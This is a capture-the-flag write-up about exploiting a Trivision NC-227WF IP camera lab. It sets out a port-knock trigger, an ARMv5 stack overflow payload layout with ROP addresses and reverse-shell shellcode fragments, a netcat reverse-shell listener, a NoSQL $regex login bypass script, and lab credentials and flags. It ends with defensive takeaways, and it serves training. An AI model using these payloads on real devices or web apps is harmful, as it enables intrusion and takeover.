CTF Writeup: Snowy ARMageddon

0

Context

Overview

An Insane-rated IoT exploitation challenge targeting a Trivision NC-227WF HD IP camera on ARMv5 architecture. The chain: port knocking via full nmap sweep, a stack-based buffer overflow in the camera’s embedded web server with custom ARM shellcode (bad character avoidance), credential harvesting from firmware, reading the flag from a live MJPEG camera feed, then NoSQL injection against a MongoDB-backed PHP app for the second key.

ATTACK CHAIN

nmap -p- → ports 22, 8080, 23(filtered), 50628
  ↓
nmap full sweep accidentally triggers knockd → port 23 opens briefly
  ↓
Trivision NC-227WF buffer overflow (port 50628)
  GET /en/login.asp?basic=[A×280][SLEEP][BX_SP][ARM_SHELLCODE]
  ↓
ARMv5 reverse shell → /var/etc/umconfig.txt → admin:Y3tiStarCur!ous
  ↓
Camera MJPEG stream → flag1: THM{YETI_ON_SCREEN_ELUSIVE_CAMERA_STAR}
  ↓
NoSQL injection (port 8080) → username[$regex]=.*
  ↓
yetikey2.txt: 2-K@bWJ5oHFCR8o%whAvK5qw8Sp$5qf!nCqGM3ksaK

1

Reconnaissance

Port Scan & Camera Fingerprinting

BASH

$ sudo nmap -sV -sC -p- --open -T4 10.112.147.128

Port	Service	Version	Notes
`22/tcp`	SSH	OpenSSH	Standard
`23/tcp`	Telnet	—	Filtered — knockd protected
`8080/tcp`	HTTP	PHP 8.1.26	403 on /login.php (trailing slash bypass)
`50628/tcp`	HTTP	Trivision webs	IP camera — ARMv5 buffer overflow target

Port 50628 serves the Trivision NC-227WF camera login — an embedded ARMv5 Linux device with a custom webs HTTP server. Port 8080 hosts a PHP/MongoDB app with a 403 bypass via trailing slash.

2

Port Knock Bypass

nmap Sweep Triggers knockd

Port 23 is protected by knockd. The knock sequence spans the full 65535-port range — but a full nmap scan (-p-) sequentially probes every port, accidentally triggering the knock sequence as it sweeps.

PYTHON — PORT POLL

# Run nmap -p- in background, poll port 23 at ~0.3s intervals
while True:
    s = socket.socket()
    s.settimeout(0.5)
    if s.connect_ex(("10.112.147.128", 23)) == 0:
        data = s.recv(4096)   # banner with camera creds
        break
    time.sleep(0.3)

When the port briefly opens, the telnet banner delivers camera credentials from /var/etc/umconfig.txt.

3

Binary Exploitation

ARMv5 Stack Buffer Overflow

The camera’s webs server has a stack-based buffer overflow in the basic= GET parameter of /en/login.asp. No ASLR on the device — library addresses are static.

Arch ARMv5TEJ (little-endian) Vuln Stack BOF in basic= parameter (>256 bytes) PC offset 284 bytes Bad chars \x00 \x09 \x0a \x0d \x20 \x23 \x26 ASLR None — static library addresses

Register	Offset	Value
`r4`	256	Padding
`r10`	280	`0x4002EC54` — `sleep()` (libc)
`pc`	284	`0x40010F88` — `bx sp` (libgcc_s)
`sp`	288	Shellcode starts here

BUFFER LAYOUT

[A × 280] [p32(0x4002EC54)] [p32(0x40010F88)] [ARM SHELLCODE]
             sleep() in r10      bx sp → jump to stack

ARM shellcode implements a reverse TCP shell. IP/port bytes encoded with mov/lsl/add sequences to avoid bad characters:

ARM — IP ENCODING (192.168.158.186)

mov  r1, #0xBA       ; 186
lsl  r1, r1, #8
add  r1, r1, #0x9E   ; 158
lsl  r1, r1, #8
add  r1, r1, #0xA8   ; 168
lsl  r1, r1, #8
add  r1, r1, #0xC0   ; 192
str  r1, [sp, #4]    ; store in sockaddr struct

REVERSE SHELL

$ nc -lvnp 4444
Connection from 10.112.147.128

# cat /proc/cpuinfo | grep "CPU architecture"
CPU architecture: 5TEJ   (ARMv5)

# cat /var/etc/umconfig.txt
name=admin
password=Y3tiStarCur!ous

4

Flag 1

Camera MJPEG Stream → Visual Flag

Login to the camera web interface at http://10.112.147.128:50628/en/login.asp with admin:Y3tiStarCur!ous. Navigate to the live MJPEG stream at /en/player/mjpeg_vga.asp — the camera is pointed at a display showing the flag:

5

NoSQL Injection

MongoDB Auth Bypass → yetikey2.txt

Port 8080 serves a PHP/MongoDB login form. Direct access returns 403 — bypassed with a trailing slash: /login.php/.

PYTHON — NoSQL INJECTION

s = requests.Session()
r = s.post("http://10.112.147.128:8080/login.php/",
    data={
        "username[$regex]": ".*",
        "password[$regex]": ".*"
    })
→ 302 redirect — authenticated

$ curl -b "PHPSESSID=<session>" http://10.112.147.128:8080/yetikey2.txt
2-K@bWJ5oHFCR8o%whAvK5qw8Sp$5qf!nCqGM3ksaK

Visualization

Attack Chain

1

Port Knock via nmap Sweep

nmap -p- triggers knockd sequence → port 23 opens → camera credentials

2

ARMv5 Stack Buffer Overflow

basic= parameter → ROP: sleep() + bx sp → ARM reverse shell

3

Camera Credential Harvest

/var/etc/umconfig.txt → admin:Y3tiStarCur!ous

4

MJPEG Stream → Flag 1

Live camera feed shows flag → THM{YETI_ON_SCREEN_ELUSIVE_CAMERA_STAR}

NoSQL Injection → yetikey2

$regex: .* auth bypass → 2-K@bWJ5oHFCR8o%whAvK5qw8Sp$5qf!nCqGM3ksaK

Assessment

Vulnerabilities

Finding	Location	Severity	Impact
Stack buffer overflow (no ASLR)	Camera `webs` server, `basic=` param	Critical	Remote code execution, root shell on IoT device
NoSQL injection (`$regex`)	Port 8080 `/login.php`	Critical	Authentication bypass, arbitrary data access
Plaintext credentials in firmware	`/var/etc/umconfig.txt`	High	Camera admin password in cleartext
403 bypass via trailing slash	Port 8080 nginx/Apache	High	Access restriction completely bypassed
Port knock sequence discoverable	knockd config	Medium	Full port scan triggers knock sequence in order

Defense

Takeaways

IoT Devices Need ASLR

Static library addresses make ROP chains trivially reliable. Embedded Linux builds must enable ASLR and PIE to raise the exploitation bar.

Sanitize MongoDB Queries

When $regex or $ne operators pass through unfiltered, any find() query can be bypassed. Use strict type checking on input.

ARM Bad Char Encoding

Encode IP/port bytes using mov/lsl/add arithmetic sequences instead of embedding raw bytes. Avoids null, space, and other bad characters in shellcode.

Port Knocking Is Not Security

Knock sequences triggered by sequential port scans provide zero protection. Use proper authentication instead of security through obscurity.

Arsenal

Tools Used

Tool	Purpose
`nmap`	Port scanning, service enum, accidental port knock trigger
`pwntools`	Cyclic pattern, offset calculation, payload construction
`custom ARM shellcode`	ARMv5 reverse TCP shell with bad char avoidance
`netcat`	Reverse shell listener
`python3 + requests`	NoSQL injection, port polling, exploit delivery
`snowy_armageddon_auto.py`	Full automated exploit chain